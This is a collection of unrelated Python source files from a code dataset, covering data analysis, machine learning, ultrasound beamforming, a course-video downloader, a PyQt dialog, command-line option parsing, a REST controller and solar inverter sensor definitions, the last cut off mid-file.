4966018 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 27 12:46:12 2021
@author: zaidanma
"""
import pandas as pd
import numpy as np
from sklearn import feature_selection
from Functions.Functions import sunreset
#import matplotlib.pyplot as plt
SMEAR2 = pd.read_excel("SMEARII/SMEAR2.xlsx")
dtypes_SMEAR2 = SMEAR2.dtypes
col_names2 = SMEAR2.columns
FilterSun = 1
if FilterSun == 1:
print('We filter the evening data')
# Hyytiala:
H = 3; latitude = 61 + 51/60; longitude = 24 + 17/60
SMEAR2_,SMEAR2_nannight = sunreset(latitude, longitude, H, SMEAR2)
SMEAR2 = SMEAR2_nannight.copy()
else:
print('No filter')
SMEAR2a = SMEAR2.set_index('Time')
dtypes_SMEAR2a = SMEAR2a.dtypes
col_names2a = SMEAR2a.columns
# SMEAR2a = SMEAR2a_nannight.copy()
Rp = SMEAR2a.corr(method ='pearson')
Rs = SMEAR2a.corr(method ='spearman')
# Arrange variables based on Pearson and Spearman correlations
# https://newbedev.com/sorting-by-absolute-value-without-changing-the-data
Rp1 = Rp.iloc[Rp['H2SO4_tower'].abs().argsort()]
Rs1 = Rs.iloc[Rp['H2SO4_tower'].abs().argsort()]
Rpearson = Rp1.index
Rspearman = Rs1.index
## MUTUAL INFORMATION
# https://stackoverflow.com/questions/29120626/removing-nans-in-numpy-arrays
# https://scikit-learn.org/stable/modules/generated/sklearn.feature_selection.mutual_info_regression.html
SMEAR2b = SMEAR2a.to_numpy()
type(SMEAR2b)
# Z = np.column_stack((SMEAR2b[:,0],SMEAR2b[:,1]))
N = SMEAR2b.shape[1]
MI = np.zeros([1,N])
for n in range(N-1):
X = SMEAR2b[:,0]
Y = SMEAR2b[:,n]
idx = np.where(~np.isnan(X+Y))
if len(idx[0]) == 0:
MI[0,n] = np.nan
else:
X = X[idx]
Y = Y[idx]
X = X.reshape((X.shape[0], 1))
Y = Y.reshape((Y.shape[0], 1))
# sklearn.feature_selection.mutual_info_regression(X, y)
MI[0,n] = feature_selection.mutual_info_regression(X, Y)
from Functions.Functions import highest_correlation
# Mutual Information
Col_names = col_names2a
CorrVars = MI
Col_namesMI, MIf = highest_correlation(Col_names,CorrVars)
# Spearman correlation
Col_names = col_names2a
CorrVars0 = Rs['H2SO4_tower'].to_numpy()
CorrVars = CorrVars0.reshape((1, CorrVars0.shape[0]))
Col_namesRs, MISpf = highest_correlation(Col_names,CorrVars)
Col_namesMI_ = Col_namesMI[0]
Col_namesRs_ = Col_namesRs[0]
Col_namesMI_top20 = Col_namesMI_[0:50,0]
Col_namesRs_top20 = Col_namesRs_[0:50,0]
Top20_ = set(Col_namesMI_top20) & set(Col_namesRs_top20)
Top20 = list(Top20_)
n = -1
for s in Col_namesRs_:
n = n + 1
if "SO2" in s[0]:
print("var SO2 is on the importance number (Spearman): "+str(n))
n = -1
for s in Col_namesMI_:
n = n + 1
if "SO2" in s[0]:
print("var SO2 is on the importance number (MI): "+str(n))
print('The size of Top 50 correlated variables is: ' + str(len(Top20)))
# https://stackoverflow.com/questions/4843158/check-if-a-string-is-a-substring-of-items-in-a-python-list-of-strings
var_word = 'SO2'
matching = [s for s in Top20 if var_word in s]
print(matching)
#%%
# OTHER STEPS:
# 1. sunset and sunrise filters, and re-calculate the correlation
# 2. H2SO4 diurnal cycles and monthly diurnal cycles + subset/sunlight
# NEXT STEPS (to be done):
# 1. Do we need to normalize data for X and Y, do we need to normalize them?
# 2. We make a comparison between MI, Rp and Rs
# For example, we can choose the first 10 vars, and find the intersections
# between Rs and MI
# 3. We group the correlations between their groups, such as RH, Temp, etc.
# 4. We select the most appropriate vars (max 5) to model H2SO4
# Also, investigate these:
# https://scikit-learn.org/stable/auto_examples/feature_selection/plot_f_test_vs_mi.html
# https://machinelearningmastery.com/feature-selection-for-regression-data/
# https://medium.com/@hertan06/which-features-to-use-in-your-model-350630a1e31c | StarcoderdataPython |
3284695 | <filename>machine_learning/regression/LogisticRegression.py<gh_stars>1-10
__author__ = "<NAME>"
__copyright__ = "Free to use, copy and modify"
__credits__ = ["<NAME>"]
__license__ = "MIT Licence"
__version__ = "0.0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
import numpy as np
import importlib
import math
import os.path
if not importlib.find_loader('matplotlib') is None:
import matplotlib.pyplot as plt
else:
print("WARNING! matplotlicb package was not installed on the vm. Plotting functionalities will not work.")
from ml_util.math_helpers import sigmoid, get_polynomial, cross_multiplication
from machine_learning.CostMinimizerBase import CostMinimizerBase
class LogisticRegression(CostMinimizerBase):
"""description of class"""
def __init__(self, iterations, alpha, includeBias = False, doNormalize = False, lambdaRate = 0.0, mapping = None, labelCount=1):
return super().__init__(iterations, alpha, includeBias, doNormalize, lambdaRate, mapping, labelCount=1)
def compute_cost(self, theta, classIndex):
y = self.get_labeled_set(classIndex)
z = np.dot(theta, self.x)
h = sigmoid(z)
cost = (-1 * (1.0 / float(self.m)) * (np.dot(np.log(h), y) + np.dot(np.log(1 - h), (1 - y)))).item(0, 0)
if (self.lambdaRate > 0.0):
cost = self.regularize_cost(cost, theta)
return cost
def compute_grads(self, theta, classIndex):
y = self.get_labeled_set(classIndex)
z = np.dot(theta, self.x)
h = sigmoid(z)
grads = (1.0 / float(self.m)) * np.dot((h - y.transpose()), self.x.transpose())
if (self.lambdaRate > 0.0):
grads = self.regularize_grads(grads, theta)
return grads
def predict(self):
z = np.dot(self.theta, self.x)
h = sigmoid(z)
return [0.0 if x < 0.5 else 1.0 for x in np.asarray(h)[0,:]] | StarcoderdataPython |
9615862 | <gh_stars>1-10
"""
Copyright (C) 2021 ETH Zurich. All rights reserved.
Author: <NAME>, ETH Zurich
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Basic libraries
import numpy as np
from os.path import dirname, abspath
import sys
import time
# Import pybf modules
from pybf.pybf.io_interfaces import ImageSaver
from pybf.pybf.image_settings import ImageSettings
from pybf.pybf.delay_calc import calc_propagation_delays
from pybf.pybf.delay_calc import convert_time_to_samples
from pybf.pybf.apodization import calc_fov_receive_apodization
from pybf.pybf.signal_processing import demodulate_decimate
from pybf.pybf.signal_processing import interpolate_modulate
from pybf.pybf.signal_processing import filter_band_pass
from pybf.pybf.signal_processing import hilbert_interpolate
# from pybf.scripts.visualize_image_dataset import visualize_image_dataset
from pybf.scripts.beamformer_cartesian_realtime import BFCartesianRealTime
# Constants
LATERAL_PIXEL_DENSITY_DEFAULT = 5
ALPHA_FOV_APOD_ANGLE_DEFAULT = 50
DB_RANGE_DEFAULT = 40
IMAGE_RESOLUTION_DEFAULT = [100, 100]
class BFCartesianReference(BFCartesianRealTime):
def __init__(self,
f_sampling,
tx_strategy,
transducer_obj,
decimation_factor,
interpolation_factor,
image_res,
img_config_obj,
db_range=DB_RANGE_DEFAULT,
start_time=None,
correction_time_shift=None,
alpha_fov_apod=ALPHA_FOV_APOD_ANGLE_DEFAULT,
bp_filter_params=None,
envelope_detector='I_Q',
picmus_dataset=False,
channel_reduction=None):
super(BFCartesianReference, self).__init__(f_sampling, tx_strategy, transducer_obj,
decimation_factor, interpolation_factor, image_res,
img_config_obj,db_range, start_time,
correction_time_shift,
alpha_fov_apod,
bp_filter_params,
envelope_detector,
picmus_dataset,
channel_reduction=channel_reduction,
is_inherited=False)
self.channel_reduction = channel_reduction
self.bf_data = []
self.mask = []
# Beamform the data using selected BF-core
def beamform(self, rf_data, numba_active=False):
print('Beamforming...')
print (' ')
start_time = time.time()
acqs_to_process = [x for x in range(self._tx_delays_samples.shape[0])]
# Allocate the data
das_out = np.zeros((len(acqs_to_process), self._pixels_coords.shape[1]), dtype = np.complex128)
# Check length
# If 2D array is given and we need to process a single acquisition
# then reshape the array
if len(rf_data.shape) == 2 and len(acqs_to_process) == 1:
rf_data_reshaped = rf_data.reshape((1, rf_data.shape[0], rf_data.shape[1]))
# If we have more than one acquisition and dimensions are aligned do nothing
elif len(rf_data.shape) == 3 and len(acqs_to_process) == rf_data.shape[0]:
rf_data_reshaped = rf_data
else:
print('Input data shape ', rf_data.shape, ' is incorrect.')
# Iterate over acquisitions
for i in acqs_to_process:
rf_data_proc = self._preprocess_data(rf_data_reshaped[i, :, :])
rf_data_proc_trans = np.transpose(rf_data_proc)
# Summ up Tx and RX delays
delays_samples = self._rx_delays_samples + self._tx_delays_samples[i, :]
# Make delay and sum operation + apodization
das_out[i,:], raw_data, self.mask = self._delay_and_sum(rf_data_proc_trans,
delays_samples.reshape(1, delays_samples.shape[0], -1))
self.bf_data.append(raw_data)
self.bf_data = np.asarray(self.bf_data)
# Coherent compounding
das_out_compound = np.sum(das_out[acqs_to_process, :], axis = 0)
# Print execution time
print('Time of execution: %s seconds' % (time.time() - start_time))
return das_out_compound.reshape(self._image_res[1], self._image_res[0])
# Perform delay and sum operation with numpy
# Input: rf_data_in of shape (n_samples x n_elements)
# delays_idx of shape (n_modes x n_elements x n_points)
def _delay_and_sum(self, rf_data_in, delays_idx):
n_elements = rf_data_in.shape[1]
n_modes = delays_idx.shape[0]
n_points = delays_idx.shape[2]
# Add one zero sample for data array (in the end)
rf_data_shape = rf_data_in.shape
rf_data = np.zeros((rf_data_shape[0] + 1, rf_data_shape[1]), dtype=np.complex64)
rf_data[:rf_data_shape[0],:rf_data_shape[1]] = rf_data_in
# If delay index exceeds the input data array dimensions,
# write -1 (it will point to 0 element)
delays_idx[delays_idx >= rf_data_shape[0] - 1] = -1
# Choose the right samples for each channel and point
# using numpy fancy indexing
# Create array for fancy indexing of channels
# of size (n_modes x n_points x n_elements)
# The last two dimensions are transposed to fit the rf_data format
fancy_idx_channels = np.arange(0, n_elements)
fancy_idx_channels = np.tile(fancy_idx_channels, (n_modes, n_points, 1))
# Create array for fancy indexing of samples
# of size (n_modes x n_points x n_elements)
# The last two dimensions are transposed to fit the rf_data format
fancy_idx_samples = np.transpose(delays_idx, axes = [0, 2, 1])
# Make the delay and sum operation by selecting the samples
# using fancy indexing,
# multiplying by apodization weights (optional)
# and then summing them up along the last axis
#######################################################################
# DAS goes here
channel_reduction = self.channel_reduction
ch_nr = n_elements
start_i = int(np.ceil((ch_nr - channel_reduction)/2))
stop_i = int(start_i + channel_reduction)
# Weights
das_weights = np.hanning(self.channel_reduction)
das_data = rf_data[fancy_idx_samples, fancy_idx_channels][0,:,start_i:stop_i]
das_out = np.zeros(das_data.shape[0], dtype=np.complex64)
data_mask = self._apod[:,start_i:stop_i]
for i in range(0, das_data.shape[0]):
# Skip irrelevant points
if (np.sum(data_mask[i,:]) == 0):
continue
das_out[i] = np.sum(np.multiply(das_data[i,:], das_weights))
#######################################################################
# Output shape: (n_modes x n_points)
return das_out, das_data, data_mask | StarcoderdataPython |
6419342 | #! /usr/bin/env python
#-*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import os
class Tutsplus:
login_url= 'https://tutsplus.com/amember/login.php'
def __init__(self, username, password):
self.username = username
self.password = password
self.login()
# Return the html source for a specified url
def get_source(self, url):
r = self.s.get(url)
return r.content
# It logs in and store the sesson for the future requests
def login(self):
self.s = requests.session()
soup = BeautifulSoup(self.get_source(self.login_url))
login_attempt_id = soup.find_all(attrs={"name": "login_attempt_id"})[0]['value']
data = {
"amember_login":self.username,
"amember_pass":<PASSWORD>,
"remember_login":1,
'login_attempt_id' : login_attempt_id
}
self.s.post(self.login_url, data = data)
return True
# Download all video from a course url
def download_course(self, url):
# Variable needed to increment the video number
self.video_number = 1
source = self.get_source(url)
soup = BeautifulSoup(source)
# the course's name
self.course_title = soup.select('.title-text')[0].string
if not os.path.exists(self.course_title) :
os.makedirs(self.course_title)
# array who stores the information about a course
course_info = self.get_info_from_course(soup)
for video in course_info:
print "[+] Downloading " + video['titolo']
self.download_video(video)
self.video_number = self.video_number + 1
def download_courses(self,courses):
for course in courses:
self.download_course(course)
# pass in the info of the lesson and it will download the video
# lesson = {
# "titolo": 'video title',
# "link" : 'http://link_to_download'
# }
def download_video(self,lesson):
source = self.get_source(lesson['link'])
soup = BeautifulSoup(source)
download_link= soup.select('.post-buttons > a')
# If it finds more than 1 download link it will skip
# the video files and will download the video only
if len(download_link) == 1:
download_link = download_link[0]
else:
download_link = download_link[1]
# String name of the file
name = self.course_title + '/[' + str(self.video_number) + '] ' + lesson['titolo'].replace('/','-')
self.download_file(download_link['href'],name)
print '[*] Downloaded > ' + lesson['titolo']
# Function who downloads the file itself
def download_file(self,url, name):
# name = url.split('/')[-1]
# NOTE the stream=True parameter
name = name + '.mp4'
r = self.s.get(url, stream=True)
if not os.path.isfile(name) :
with open(name, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
return name
# return an array with all the information about a video (title, url)
def get_info_from_course(self, soup):
arr = []
videos = soup.select('.section-title > a')
for video in videos:
if video.string is not None:
titolo = video.string
link = video['href']
info = {
"titolo":titolo,
"link":link
}
arr.append(info)
return arr
| StarcoderdataPython |
11211422 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ItemEditor.ui'
#
# Created: Thu Jan 1 18:00:12 2015
# by: PyQt4 UI code generator 4.10.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_ItemEditor(object):
def setupUi(self, ItemEditor):
ItemEditor.setObjectName(_fromUtf8("ItemEditor"))
ItemEditor.resize(714, 429)
self.gridLayout = QtGui.QGridLayout(ItemEditor)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.items = QtGui.QTreeWidget(ItemEditor)
self.items.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.items.setObjectName(_fromUtf8("items"))
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
item_0 = QtGui.QTreeWidgetItem(self.items)
self.gridLayout.addWidget(self.items, 0, 0, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(ItemEditor)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.retranslateUi(ItemEditor)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("accepted()")), ItemEditor.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("rejected()")), ItemEditor.reject)
QtCore.QMetaObject.connectSlotsByName(ItemEditor)
def retranslateUi(self, ItemEditor):
ItemEditor.setWindowTitle(_translate("ItemEditor", "Items", None))
self.items.headerItem().setText(0, _translate("ItemEditor", "Name", None))
self.items.headerItem().setText(1, _translate("ItemEditor", "Price", None))
self.items.headerItem().setText(2, _translate("ItemEditor", "Fuel", None))
self.items.headerItem().setText(3, _translate("ItemEditor", "Speed", None))
self.items.headerItem().setText(4, _translate("ItemEditor", "Food", None))
self.items.headerItem().setText(5, _translate("ItemEditor", "Sanity", None))
self.items.headerItem().setText(6, _translate("ItemEditor", "Attack", None))
self.items.headerItem().setText(7, _translate("ItemEditor", "Defense", None))
__sortingEnabled = self.items.isSortingEnabled()
self.items.setSortingEnabled(False)
self.items.topLevelItem(0).setText(0, _translate("ItemEditor", "Engine", None))
self.items.topLevelItem(1).setText(0, _translate("ItemEditor", "Fuel", None))
self.items.topLevelItem(2).setText(0, _translate("ItemEditor", "Food", None))
self.items.topLevelItem(3).setText(0, _translate("ItemEditor", "Ship improvements", None))
self.items.topLevelItem(4).setText(0, _translate("ItemEditor", "Special food", None))
self.items.topLevelItem(5).setText(0, _translate("ItemEditor", "Machine", None))
self.items.topLevelItem(6).setText(0, _translate("ItemEditor", "Gun", None))
self.items.topLevelItem(7).setText(0, _translate("ItemEditor", "Ship weapon", None))
self.items.topLevelItem(8).setText(0, _translate("ItemEditor", "Ship shield", None))
self.items.setSortingEnabled(__sortingEnabled)
| StarcoderdataPython |
3590004 | <reponame>peterbe/configman
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is configman
#
# The Initial Developer of the Original Code is
# Mozilla Foundation
# Portions created by the Initial Developer are Copyright (C) 2011
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# <NAME>, <EMAIL>
# <NAME>, <EMAIL>
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
"""This module implements a configuration value source from the commandline.
It uses getopt in its implementation. It is thought that this implementation
will be supplanted by the argparse implementation when using Python 2.7 or
greater.
This module declares that its ValueSource constructor implementation can
handle the getopt module or a list. If specified as the getopt module, the
constructor will fetch the source of argv from the configmanager that was
passed in. If specified as a list, the constructor will assume the list
represents the argv source."""
import getopt
import collections
from .. import dotdict
from .. import option
from .. import namespace
from ..config_exceptions import NotAnOptionError
from .. import converters as conv
from source_exceptions import ValueException, CantHandleTypeException
class GetOptFailureException(ValueException):
pass
can_handle = (getopt,
list, # a list of options to serve as the argv source
)
class ValueSource(object):
"""The ValueSource implementation for the getopt module. This class will
interpret an argv list of commandline arguments using getopt."""
def __init__(self, source, the_config_manager=None):
if source is getopt:
self.argv_source = the_config_manager.argv_source
elif isinstance(source, collections.Sequence):
self.argv_source = source
else:
raise CantHandleTypeException("don't know how to handle"
" %s." % str(source))
def get_values(self, config_manager, ignore_mismatches):
"""This is the black sheep of the crowd of ValueSource implementations.
It needs to know ahead of time all of the parameters that it will need,
but we cannot give it. We may not know all the parameters because
not all classes may have been expanded yet. The two parameters allow
this ValueSource implementation to know what the parameters have
already been defined. The 'ignore_mismatches' parameter tells the
implementation if it can or cannot ignore extraneous commandline
options. The last time this function is called, it will be required
to test for illegal commandline options and respond accordingly."""
short_options_str, \
long_options_list = self.getopt_create_opts(
config_manager.option_definitions)
try:
if ignore_mismatches:
fn = ValueSource.getopt_with_ignore
else:
fn = getopt.gnu_getopt
# here getopt looks through the command line arguments and
# consumes the defined switches. The things that are not
# consumed are then offered as the 'args' variable of the
# parent configuration_manager
getopt_options, config_manager.args = fn(self.argv_source,
short_options_str,
long_options_list)
except getopt.GetoptError, x:
raise NotAnOptionError(str(x))
command_line_values = dotdict.DotDict()
for opt_name, opt_val in getopt_options:
if opt_name.startswith('--'):
name = opt_name[2:]
else:
name = self.find_name_with_short_form(opt_name[1:],
config_manager.option_definitions,
'')
if not name:
raise NotAnOptionError('%s is not a valid short'
' form option' % opt_name[1:])
option_ = config_manager._get_option(name)
if option_.from_string_converter == conv.boolean_converter:
command_line_values[name] = not option_.default
else:
command_line_values[name] = opt_val
return command_line_values
def getopt_create_opts(self, option_definitions):
short_options_list = []
long_options_list = []
self.getopt_create_opts_recursive(option_definitions,
"",
short_options_list,
long_options_list)
short_options_str = ''.join(short_options_list)
return short_options_str, long_options_list
def getopt_create_opts_recursive(self, source,
prefix,
short_options_list,
long_options_list):
for key, val in source.items():
if isinstance(val, option.Option):
boolean_option = type(val.default) == bool
if val.short_form:
try:
if boolean_option:
if val.short_form not in short_options_list:
short_options_list.append(val.short_form)
else:
short_with_parameter = "%s:" % val.short_form
if short_with_parameter not in short_options_list:
short_options_list.append(short_with_parameter)
except AttributeError:
pass
if boolean_option:
long_options_list.append('%s%s' % (prefix, val.name))
else:
long_options_list.append('%s%s=' % (prefix, val.name))
elif isinstance(val, option.Aggregation):
pass # skip Aggregations they have nothing to do with getopt
else: # Namespace case
new_prefix = '%s%s.' % (prefix, key)
self.getopt_create_opts_recursive(val,
new_prefix,
short_options_list,
long_options_list)
#--------------------------------------------------------------------------
@staticmethod
def getopt_with_ignore(args, shortopts, longopts=[]):
"""my_getopt(args, options[, long_options]) -> opts, args
This function works like gnu_getopt(), except that unknown parameters
are ignored rather than raising an error.
"""
opts = []
prog_args = []
if isinstance(longopts, str):
longopts = [longopts]
else:
longopts = list(longopts)
while args:
if args[0] == '--':
prog_args += args[1:]
break
if args[0][:2] == '--':
try:
opts, args = getopt.do_longs(opts, args[0][2:],
longopts, args[1:])
except getopt.GetoptError:
prog_args.append(args[0])
args = args[1:]
elif args[0][:1] == '-':
try:
opts, args = getopt.do_shorts(opts, args[0][1:], shortopts,
args[1:])
except getopt.GetoptError:
prog_args.append(args[0])
args = args[1:]
else:
prog_args.append(args[0])
args = args[1:]
return opts, prog_args
#--------------------------------------------------------------------------
def find_name_with_short_form(self, short_name, source, prefix):
for key, val in source.items():
type_of_val = type(val)
if type_of_val == namespace.Namespace:
new_prefix = '%s.' % key
name = self.find_name_with_short_form(short_name, val,
new_prefix)
if name:
return name
else:
try:
if short_name == val.short_form:
return '%s%s' % (prefix, val.name)
except KeyError:
continue
return None
| StarcoderdataPython |
1895510 | <filename>senlin/api/openstack/v1/cluster_policies.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ClusterPolicies endpoint for Senlin v1 ReST API.
"""
from webob import exc
from senlin.api.openstack.v1 import util
from senlin.common import serializers
from senlin.common import wsgi
from senlin.rpc import client as rpc_client
class ClusterPolicyController(object):
'''WSGI controller for Cluster-Policy binding resource in Senlin v1 API.'''
# Define request scope (must match what is in policy.json)
REQUEST_SCOPE = 'cluster_policies'
def __init__(self, options):
self.options = options
self.rpc_client = rpc_client.EngineClient()
def default(self, req, **args):
raise exc.HTTPNotFound()
@util.policy_enforce
def index(self, req, cluster_id):
filter_whitelist = {
'priority': 'single',
'level': 'single',
'cooldown': 'single',
'enabled': 'single',
}
param_whitelist = {
'sort_dir': 'single',
'sort_keys': 'multi',
}
params = util.get_allowed_params(req.params, param_whitelist)
filters = util.get_allowed_params(req.params, filter_whitelist)
if not filters:
filters = None
policies = self.rpc_client.cluster_policy_list(req.context,
cluster_id=cluster_id,
filters=filters,
**params)
return {'cluster_policies': policies}
@util.policy_enforce
def get(self, req, cluster_id, policy_id):
cluster_policy = self.rpc_client.cluster_policy_get(
req.context, cluster_id=cluster_id, policy_id=policy_id)
return {'cluster_policy': cluster_policy}
def create_resource(options):
'''ClusterPolicies resource factory method.'''
return wsgi.Resource(ClusterPolicyController(options),
wsgi.JSONRequestDeserializer(),
serializers.JSONResponseSerializer())
| StarcoderdataPython |
8008412 | import numpy as np
import pandas as pd
from nltk.corpus import reuters
import text_clean as tc
# quick summary of the reuters corpus
print("$$$ The reuters corpus has {} tags".format(len(reuters.categories())))
print("$$$ The reuters corpus has {} documents".format(len(reuters.fileids())))
# create counter to summarize
categories = []
file_count = []
# count each tag's number of documents
for i in reuters.categories():
"""print("$ There are {} documents included in topic \"{}\""
.format(len(reuters.fileids(i)), i))"""
file_count.append(len(reuters.fileids(i)))
categories.append(i)
# create a dataframe out of the counts
df = pd.DataFrame(
{'categories': categories, "file_count": file_count}) \
.sort_values('file_count', ascending=False)
print(df.head())
# Select documents that only contains top two labels with most documents
cat_start = 1
cat_end = 2
category_filter = df.iloc[cat_start:cat_end + 1, 0].values.tolist()
print(f"The following categories are selected for the analysis: \
{category_filter}")
# select fileid with the category filter
doc_list = np.array(reuters.fileids(category_filter))
doc_list = doc_list[doc_list != 'training/3267']
test_doc = doc_list[['test' in x for x in doc_list]]
train_doc = doc_list[['training' in x for x in doc_list]]
test_corpus = [" ".join([t for t in reuters.words(test_doc[t])])
for t in range(len(test_doc))]
train_corpus = [" ".join([t for t in reuters.words(train_doc[t])])
for t in range(len(train_doc))]
# create clean corpus for word2vec approach
test_clean_string = tc.clean_corpus(test_corpus)
train_clean_string = tc.clean_corpus(train_corpus)
print(test_clean_string[0])
# create clean corpus for bow approach
test_clean_token = tc.clean_corpus(test_corpus, string_line=False)
train_clean_token = tc.clean_corpus(train_corpus, string_line=False)
print(test_clean_token[0])
# quick look at the word frequency
test_bow, test_word_freq = tc.get_bow(test_clean_token)
train_bow, train_word_freq = tc.get_bow(train_clean_token)
| StarcoderdataPython |
3394177 | import os
folder = "C:/Users/Pasca/OneDrive/Dokumente/Master_3.Semester/Master_3.Semester/SYSL/Cascade_Classifier/"
neg_data = "neg_red_triangle_channel++"
f = open(folder + neg_data + "_bg.txt", "w")
for img in os.listdir(folder + neg_data):
f.write(neg_data + "/" + img + "\n")
f.close()
| StarcoderdataPython |
1612439 | <filename>pysma/definitions.py
"""Sensor definitions for SMA WebConnect library for Python."""
from .const import (
DEVCLASS_BATTERY,
DEVCLASS_ENERGY_METER,
DEVCLASS_INVERTER,
DEVICE_INFO,
ENERGY_METER_VIA_INVERTER,
JMESPATHS_TAG,
OPTIMIZERS_VIA_INVERTER,
)
from .sensor import Sensor
# Status - Operation
#: Status of the device
status = Sensor("6180_08214800", "status", path=JMESPATHS_TAG, l10n_translate=True)
#: General operating status
operating_status_general = Sensor(
"6180_08412800",
"operating_status_general",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
# Status - Operation - Inverter
#: General operating status
inverter_condition = Sensor(
"6180_08414C00",
"inverter_condition",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
#: Inverter Condition
inverter_system_init = Sensor(
"6800_08811F00",
"inverter_system_init",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
#: Grid connection status
grid_connection_status = Sensor(
"6180_0846A700",
"grid_connection_status",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
#: Grid relay status
grid_relay_status = Sensor(
"6180_08416400",
"grid_relay_status",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
# DC side - DC measurements PV
#: Current power generated by the solar panels (A side)
pv_power_a = Sensor("6380_40251E00_0", "pv_power_a", unit="W")
#: Current power generated by the solar panels (B side)
pv_power_b = Sensor("6380_40251E00_1", "pv_power_b", unit="W")
#: Current voltage generated by the solar panels (A side)
pv_voltage_a = Sensor("6380_40451F00_0", "pv_voltage_a", unit="V", factor=100)
#: Current voltage generated by the solar panels (B side)
pv_voltage_b = Sensor("6380_40451F00_1", "pv_voltage_b", unit="V", factor=100)
#: Current amperage generated by the solar panels (A side)
pv_current_a = Sensor("6380_40452100_0", "pv_current_a", unit="A", factor=1000)
#: Current amperage generated by the solar panels (B side)
pv_current_b = Sensor("6380_40452100_1", "pv_current_b", unit="A", factor=1000)
# DC Side - Insulation monitoring
#: Insulation residual current
insulation_residual_current = Sensor(
"6102_40254E00", "insulation_residual_current", unit="mA"
)
# AC Side - Grid measurements
#: Power supplied to the grid. grid_power = power_l1 + power_l2 + power_l3
grid_power = Sensor("6100_40263F00", "grid_power", unit="W")
#: Grid frequency
frequency = Sensor("6100_00465700", "frequency", unit="Hz", factor=100)
# AC Side - Grid measurements - Active power
#: Power for phase 1
power_l1 = Sensor("6100_40464000", "power_l1", unit="W", enabled=False)
#: Power for phase 2
power_l2 = Sensor("6100_40464100", "power_l2", unit="W", enabled=False)
#: Power for phase 3
power_l3 = Sensor("6100_40464200", "power_l3", unit="W", enabled=False)
# AC Side - Grid measurements - Reactive power
#: Total Reactive Power
grid_reactive_power = Sensor("6100_40265F00", "grid_reactive_power", unit="var")
#: Reactive Power for phase 1
grid_reactive_power_l1 = Sensor(
"6100_40666000", "grid_reactive_power_l1", unit="var", enabled=False
)
#: Reactive Power for phase 2
grid_reactive_power_l2 = Sensor(
"6100_40666100", "grid_reactive_power_l2", unit="var", enabled=False
)
#: Reactive Power for phase 3
grid_reactive_power_l3 = Sensor(
"6100_40666200", "grid_reactive_power_l3", unit="var", enabled=False
)
# AC Side - Grid measurements - Apparent power
#: Total Apparent Power
grid_apparent_power = Sensor("6100_40666700", "grid_apparent_power", unit="VA")
#: Apparent Power for phase 1
grid_apparent_power_l1 = Sensor(
"6100_40666800", "grid_apparent_power_l1", unit="VA", enabled=False
)
#: Apparent Power for phase 2
grid_apparent_power_l2 = Sensor(
